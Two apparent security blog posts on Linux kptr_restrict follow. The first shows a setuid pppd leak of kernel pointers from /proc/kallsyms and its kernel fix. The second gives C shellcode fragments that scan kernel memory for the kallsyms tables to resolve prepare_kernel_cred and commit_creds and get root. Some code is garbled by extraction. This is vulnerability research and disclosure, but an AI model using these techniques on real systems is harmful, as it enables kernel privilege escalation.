Category: security

kptr_restrict – privilege checks

In the Linux kernel kptr_restrict is used to protect sensitive kernel pointer values by printing them as zeros if a kernel provided file (e.g. /sys, /proc, etc) is read as a non-privileged user. This is implemented with a printf extension called “%pK”. Typically code prints to a /sys or /proc file using the seq_file interface. For example:

seq_printf(m, "secret pointer = %pK\n", secret_pointer);

When kptr_restrict is enabled and a file using this interface is read a check is done to see if the user has CAP_SYSLOG. If so, the real pointer value is printed, otherwise zeros are printed.

This deviates from the normal UNIX file privilege model, where file permissions are checked at open time, not read time. This becomes a problem when a setuid binary reads a file which uses %pK to protect sensitive pointers. Setuid binaries which need to open files will typically drop privileges to open the file. This ensures that only files which the real user has access to will be opened. Once the file is opened, the setuid binary can re-elevate its privileges.

Consider the code in pppd for parsing the options file in pppd/options.c:options_from_file():

euid = geteuid();
if (check_prot && seteuid(getuid()) == -1) {
    option_error("unable to drop privileges to open %s: %m", filename);
    return 0;
f = fopen(filename, "r");
err = errno;
if (check_prot && seteuid(euid) == -1)
    fatal("unable to regain privileges");

The effective user id is set to the real user id and then the options file is opened. Only a file readable by the real user can be opened here. Once the file has been successfully opened, the pppd binary immediately re-elevates privileges. Looking a few lines down in the code we see this:

while (getword(f, cmd, &newline, filename)) {
    opt = find_option(cmd);
    if (opt == NULL) {
        option_error("In file %s: unrecognized option '%s'",
                     filename, cmd);
        goto err;

The pppd option parser reads commands, and will print out an error if the command is not valid.

The problem is that %pK checks privileges when the file is read, not when it is opened. Most files which use %pK are world readable, so they will pass the open check in pppd. But when the read is done pppd is running as root and so the %pK protection will not be in effect. Which means we can do this:

$ head -1 /proc/kallsyms 
00000000 T startup_32 
$ pppd file /proc/kallsyms
pppd: In file /proc/kallsyms: unrecognized option 'c1000000'

Unfortunately pppd bails on the first error in the file, so we can’t get it to dump the full contents of /proc/kallsyms. It is useful for one-liner %pK files such as those in /sys/module//sections/* though. Most setuid applications avoid printing anything from opened files, pppd being the only one I could find in a stock Ubuntu 12.04 installation. If you get lucky though, you might find a less paranoid setuid binary which will happily write out the full contents of a file under the assumption that the real user must be able to read it anyway.

The quick and dirty fix to this issue is to check that, in addition to having CAP_SYSLOG, the real and effective uids and gids are equal before printing the real %pK values. That fix has been merged into mainline Linux here.

The better long term fix is to do the privilege check at open time and store it as part of the seq_file structure. Rather than using a %pK, a function should be used which checks the stored privilege. For example:

seq_printf(m, "secret pointer = %p\n", 
           seq_secret_pointer(m, secret_pointer));

The seq_secret_pointer function should return NULL if the user which issued the open does not have CAP_SYSLOG. Unfortunately, fixing this is not entirely straight forward. Most users of %pK are using the seq_file interface, and can be easily converted. There are a handful of %pK uses in printk statements, which are basically just incorrect since no sane permission check can be done (nobody opens printk). There is already a protection mechanism for printk, called dmesg_restrict, so the printk uses can simply be changed to %p. The only problem is the module sections files (see above), which use the traditional style sysfs show function rather than a seq_file (see kernel/module.c: module_sect_show()). Some thought needs to go into how to refactor that code in order to store the open time privileges.


kptr_restrict – Finding kernel symbols for shell code

A common approach to getting a root shell from an exploit which grants execution in the kernel is to jump to a user controlled function which does the following:


These kernel functions will create a new credit structure with root privileges, and then commit that credit structure to the current process. After returning to user-space, a root shell can be spawned.

Before doing all this, the attacker needs to know the addresses of the kernel functions. Helpfully, the Linux kernel provides a user readable file called /proc/kallsyms, which lists the addresses of all the exported symbols in the kernel. An unprivileged attacker can use this file to get the addresses of necessary kernel functions for the shell code. For example:

$ grep prepare_kernel_cred /proc/kallsyms | head -1
84056fec T prepare_kernel_cred

Being able to do this as an unprivileged user has more recently (at least by the mainline kernel) been viewed as undesirable, because it provides internal kernel information to attackers. As such, there was discussion around making /proc/kallsyms unreadable, which eventually resulted in a feature called kptr_restrict being added to the kernel.

kptr_restrict is a sysctl which makes pointer values printed with “%pK” appear as zero, unless you have CAP_SYSLOG. With it enabled, we get the following instead:

$ grep prepare_kernel_cred /proc/kallsyms | head -1
00000000 T prepare_kernel_cred

Which is much less useful to a would-be attacker. In the initial discussion about hiding /proc/kallsyms, a few people pointed out that most installations are distro kernels, and attackers can simply hard-code the addresses for the necessary functions. Indeed, this is what a number of PoC exploits now do, sometimes with a small table for targeting a few different kernels. This works, but significantly reduces the number of machines that the exploit will work against.

I wanted to try and find a generic, portable method for finding the kernel symbols even with kptr_restrict enabled. For this example, I am assuming that an attacker has already gained kernel mode code execution, and needs a reliable way to find the addresses of the necessary kernel functions for creating the shell code. Note that once you have code execution, you have really already won, and kptr_restrict, and many other protections will cease to be fully effective. kptr_restrict is still effective against other forms of attacks, such as arbitrary writes. The method I’m presenting here is just one possible way to get the the kallsyms addresses once executing in kernel mode.

I started by looking at what information can be gathered about the kallsyms. Although kptr_restrict hides the most useful information, the symbol addresses, an unprivileged user can still read the file and collect some information about the symbols, including:

  • The names of the symbols
  • The number of symbols
  • The order that they appear in the kernel’s kallsyms table

The first thing to note is that the kallsyms table is large. There are around seventy-thousand built-in symbols on my desktop machine. Since we know the order and names of the symbols, we can probably search for a matching table in the kernel’s memory. The sheer size and uniqueness of the table makes it certain that a match will be what we are looking for. So lets look at how the kernel stores the table. From kernel/kallsyms.c:

extern const unsigned long kallsyms_addresses[] __attribute__((weak));
extern const u8 kallsyms_names[] __attribute__((weak));

The __attribute__((weak)) part is a gcc directive which marks the symbols as weak, meaning that any other definition of these symbols will supersede these ones. This doesn’t matter for our purposes, since either way, the arrays will be in the data section. Looking through the code in kernel/kallsyms.c we can see that kallsyms_addresses is an ordinary array, but kallsyms_name is a compressed string table. We also note that the arrays in kernel/kallsyms.c only stores the built-in symbols; module symbols are stored elsewhere.

Before attempting to match the kallsyms name table, we first need to create a compressed version. Fortunately there is some code already provided for this in scripts/kallsyms.c. Usually scripts/kallsyms runs during the Linux kernel build and takes the file as an input and generates an assembler file as its output. Looking at the file we see that it has the same format as /proc/kallsyms, so we can reuse scripts/kallsyms.c with only a few small modifications:

  • We don’t want to sort the symbols in the input file, since /proc/kallsyms is already sorted.
  • We want to skip module symbols from /proc/kallsyms. These can be identified by having “[module_name]” at the end of the string.
  • We want to create an in memory copy of the name table, rather than writing it to a file.

By doing that we can create an exact copy of the kallsyms_names array in user-space. The next step is to find it once we are executing in kernel mode. The kallsyms_names array is in the data section, which is at the base of the kernel’s memory. Before searching for it, we need to find out where the kernel actual resides, since its location depends on the architecture and the VM split. We can determine the address of the kernel by attempting to mmap addresses where the kernel might be, starting with low addresses and working our way up. If an mmap call fails, then chances are that the kernel resides there:

static unsigned long *kernel_base;

static void find_kernel_base(void)
        unsigned long addrs[] = {
#ifdef X64
        void *map;
        int i;

        for (i = 0; i <; ARRAY_SIZE(addrs); i++) {
                map = mmap((void *)addrs[i], 0x1000, PROT_NONE,
                           MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
                if (map == MAP_FAILED) {
                        kernel_base = (unsigned long *)addrs[i];
                        printf("Guess kernel base @ %p\n", kernel_base);
                munmap((void *)addrs[i], 0x1000);

        printf("Can't guess kernel base\n");

The kallsyms_names array resides in the kernel’s data section, which is at the base of its memory. We don’t know the exact location, but that doesn’t matter because the kernel’s low memory is always contiguously mapped. We should be able to scan about 16MB from the kernel’s base on most architectures without problem.

When trying to match the table, we first do a partial match to speed things up. Here is the first part of our shell code which runs in kernel space:

#define KERNEL_LOWMEM_SIZE (16 * 1024 * 1024)

static unsigned long *kallsyms_find_name_table(void)
        unsigned long *addr;
        int count;

        for (addr = kernel_base; 
             addr + kallsyms_names_size < kernel_base + KERNEL_LOWMEM_SIZE; 	     
             addr++) { 		
                if (memcmp(addr, kallsyms_names, PARTIAL_MATCH_SIZE) != 0)
                if (memcmp(addr, kallsyms_names, kallsyms_names_size) != 0)
                return addr;

        /* Couldn't find it */
        return NULL;

We now know the location of the kallsyms_names array in the kernel (and have verified that our view of it from user-space is consistent with the kernel’s view). From here we need to find the kallsyms_addresses table. In the kernel/kallsyms.c code the kallsyms_addresses array is declared immediately before the kallsyms_names array, so it should be just before it in the data section. Note that while the compiler could re-arrange these arrays, there is probably little reason for it to do so. It does however, re-align the kallsyms_addresses array (probably for cache performance), and may move some other variables between the two arrays (notably kallsyms_num_syms). We know how many symbols there are (stored in the table_cnt variable in the scripts/kallsyms.c code), that the symbols are in order, and that all of the symbol addresses will be in the low part of the kernels memory. This allows to scan backwards from the beginning of the kallsyms_name table to find the kallsyms_addresses table. We first subtract the table_cnt from the kallsyms_names location, and then continue going backwards while we have a valid looking kernel pointer, which is less than or equal to the one above it:

static bool is_kernel_pointer(unsigned long value) {
#ifdef X64
                 * Ubuntu 64-bit lists a bunch of data items with low
                 * addresses in /proc/kallsyms.
                (value >= 0x0 && value <= 0x20000) ||
                (value >= (unsigned long)kernel_base &&
                 value <= (unsigned long)kernel_base + KERNEL_LOWMEM_SIZE);

static unsigned long *kallsyms_find_addr_table(unsigned long *names_base)
        unsigned long *addr, prev_ptr = ~0;

        for (addr = names_base - table_cnt; addr >= kernel_base; addr--) {
                if (!is_kernel_pointer(*addr) || *addr > prev_ptr)

                prev_ptr = *addr;

        if (addr == kernel_base) {
                /* Whoops */
                return NULL;

        return addr;

We now have the location of the kallsyms_addresses array. The next step is for our shell code to get the addresses of the functions it needs. The easiest way to do this is to prepare the array indexes of the functions before we enter kernel-space. We can get these from /proc/kallsyms, allowing our shell code to then do:

prepare_kernel_cred = (void *)ksyms[idx_prepare_kernel_cred];
commit_creds = (void *)ksyms[idx_commit_creds];


Return to user-space, spawn a shell and now we are root. I’ve tested this approach using the same code on 64 and 32bit versions of Ubuntu 12.04, and on Linux 3.7 running on an ARM Realview PB-A8. In each case the shell code is able to find the kallsyms_addresses array and subsequently get root.

There are also some other interesting approaches to finding the kernel symbol names. Spender’s enlightenment framework looks for a unique string in the kernel/kallsyms.c text, and then uses that as a starting point for finding the function kallsyms_lookup_name(), which the shell code can then use to find any the address of symbol while running in kernel space. Another approach is to scan kernel memory for the “%pK %c %s” string that is used to print /proc/kallsyms and replace the “K” with a space, disabling the kptr_restrict protection for the string.